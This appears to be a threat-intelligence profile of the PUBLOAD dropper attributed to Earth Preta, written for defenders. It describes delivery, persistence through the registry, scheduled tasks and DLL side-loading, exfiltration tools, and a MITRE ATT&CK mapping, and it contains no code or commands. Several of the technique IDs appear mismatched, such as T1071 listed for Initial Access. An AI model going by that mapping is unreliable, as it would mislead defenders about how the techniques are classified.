PUBLOAD (Dropper) – Malware

Overview

PUBLOAD is a sophisticated piece of malware that has been widely associated with the Earth Preta threat group, an advanced persistent threat (APT) actor that has continuously refined its tactics and tools. Recognized for its ability to establish remote access and maintain control over compromised systems, PUBLOAD is often deployed as a first-stage payload, setting the stage for further malicious activities within targeted networks. This malware is central to Earth Preta’s evolving attack strategies, enabling it to propagate quickly across networks, gather sensitive information, and facilitate further exploitation.

Historically, PUBLOAD has been delivered through spear-phishing campaigns, with attackers using social engineering techniques to trick victims into executing the malicious payload. However, more recent developments show that Earth Preta has diversified its delivery methods, including the use of the HIUPAN worm, a versatile tool that spreads PUBLOAD via removable drives. This evolution in distribution mechanisms highlights the group’s adaptability and their ability to target networks in ways that bypass traditional security defenses, such as email filters and firewalls.

Targets

Information

How they operate

Delivery and Initial Access

PUBLOAD is commonly delivered through spear-phishing emails that exploit user trust to get the malware onto the victim’s system. However, a more recent and notable method of delivery involves its propagation via a variant of the HIUPAN worm, which spreads through removable drives. Once the worm is executed on a target machine, PUBLOAD is dropped as a secondary payload. This method is particularly effective in environments with limited network monitoring or where removable drives are frequently used, allowing attackers to bypass network security measures and infect systems physically. The HIUPAN worm acts as a precursor, ensuring that PUBLOAD reaches its intended targets.

Execution and Control

Once deployed on the victim machine, PUBLOAD acts as the primary control tool. It performs a variety of functions necessary for the attacker’s control over the infected system. PUBLOAD can execute other malicious payloads, such as RAR for data collection and curl for data exfiltration. The malware runs in the background, allowing attackers to maintain control of the system without detection. Its ability to execute arbitrary commands enables it to serve as a launchpad for further exploitation of the target environment. By leveraging PUBLOAD, attackers can manipulate files, gather sensitive data, and establish a more persistent presence in the system.

Persistence Mechanisms

A key feature of PUBLOAD is its ability to maintain persistence within the infected system. Once installed, it modifies system settings to ensure it remains active even after a reboot. This is achieved by adding entries to the system’s registry and scheduling tasks that enable PUBLOAD to restart automatically. It often installs executables in locations that are unlikely to raise suspicion, such as in the ProgramData directory, and uses techniques like DLL side-loading to hide its presence. These methods allow the malware to evade detection from traditional security tools, making it difficult to remove.

Supplemental Tools and Lateral Movement

PUBLOAD is often used in conjunction with other tools to extend the capabilities of the attackers. For instance, tools like FDMTP and PTSOCKET are deployed as secondary control and exfiltration tools. FDMTP is used to manage file transfers, while PTSOCKET allows for alternative exfiltration methods. These tools enable attackers to bypass network defenses and maintain flexibility in their communication with command-and-control (C2) servers. Through these tools, PUBLOAD enables attackers to conduct lateral movement within the network, allowing them to expand their reach and compromise additional systems. This makes the attack more dynamic and harder to contain.

Data Exfiltration and Escalation

The ultimate goal of PUBLOAD is often to facilitate data exfiltration. Through its various tools, it can silently collect sensitive information from the infected system and send it to the attackers. PTSOCKET, for example, can be used to transfer stolen data over encrypted channels, making it difficult to detect and prevent. This stealthy exfiltration method enables attackers to gather critical data such as intellectual property, government secrets, or personally identifiable information (PII). Furthermore, PUBLOAD can assist in privilege escalation within the compromised environment, allowing attackers to gain higher access levels and further extend the scope of their operations.

Conclusion

PUBLOAD is a highly effective malware that serves as a critical tool in advanced cyberattacks. By leveraging multiple delivery methods, execution techniques, persistence mechanisms, and supplementary tools, it enables attackers to maintain control over infected systems, move laterally within networks, and exfiltrate valuable data. Its ability to remain undetected and operate covertly makes it a powerful weapon in the arsenal of cybercriminals and state-sponsored actors alike. Understanding how PUBLOAD works on a technical level is crucial for organizations to defend against its threats, implement effective detection measures, and improve their overall cybersecurity posture.

MITRE Tactics and Techniques

Initial Access (T1071)

PUBLOAD is often delivered through spear-phishing campaigns or via the propagation of a variant of the HIUPAN worm using removable drives. This tactic allows the malware to gain an initial foothold in a target system, often by exploiting user trust or by leveraging physical media to bypass network-based defenses.

Execution (T1203)

Once the malware is delivered, PUBLOAD executes on the victim’s machine, establishing the attacker’s ability to run arbitrary commands and control the infected system. This can involve triggering payloads or executing downloaded components, such as RAR for collection or curl for exfiltration.

Persistence (T1547)

To maintain persistence on the infected system, PUBLOAD modifies the registry, creates scheduled tasks, or installs new executables to ensure it continues running even after a system reboot. This tactic is essential for attackers to maintain long-term access to compromised networks.

Privilege Escalation (T1078)

In certain cases, PUBLOAD may be used to escalate privileges on the infected system, allowing the attacker to gain higher-level access for further control. This can involve bypassing security mechanisms or exploiting vulnerabilities to perform actions with administrative privileges.

Command and Control (T1071)

PUBLOAD utilizes command-and-control (C2) communication mechanisms to facilitate communication between the infected machine and the attacker’s infrastructure. This enables attackers to issue commands, exfiltrate data, and deploy additional malicious tools or payloads.

Exfiltration (T1041)

PUBLOAD facilitates data exfiltration by deploying tools such as FDMTP or PTSOCKET, which can be used to send stolen data out of the target environment. These tools are designed to operate covertly, making detection of data transfer activities more difficult.

Lateral Movement (T1075)

By leveraging additional tools introduced by PUBLOAD, attackers can move laterally within the network, accessing other systems and expanding the reach of their attack. This tactic allows them to escalate the scope of their operations and further infiltrate sensitive data sources.

References

• Earth Preta Evolves its Attacks with New Malware and Strategies